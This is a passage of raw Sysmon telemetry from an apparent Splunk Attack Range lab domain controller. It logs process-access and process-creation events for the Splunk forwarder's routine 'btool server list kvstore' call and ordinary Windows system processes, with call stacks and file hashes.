Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-647E-6064-4A00-00000000AE01}2612C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 10341000x80000000000000002271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-4A00-00000000AE01}2612C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-4A00-00000000AE01}2612C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-647E-6064-4900-00000000AE01}30882768C:\Windows\system32\cmd.exe{266CAFBE-647E-6064-4A00-00000000AE01}2612C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.973{266CAFBE-647E-6064-4A00-00000000AE01}2612C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-647E-6064-4900-00000000AE01}3088C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000002258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.960{266CAFBE-647E-6064-4800-00000000AE01}40763036C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.960{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-4900-00000000AE01}3088C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.960{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.960{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.960{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.960{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.960{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.960{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.960{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.960{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.960{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.960{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-4900-00000000AE01}3088C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.960{266CAFBE-647E-6064-3F00-00000000AE01}38403844C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-647E-6064-4900-00000000AE01}3088C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.967{266CAFBE-647E-6064-4900-00000000AE01}3088C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647E-6064-3F00-00000000AE01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000002244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.960{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-4800-00000000AE01}4076C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 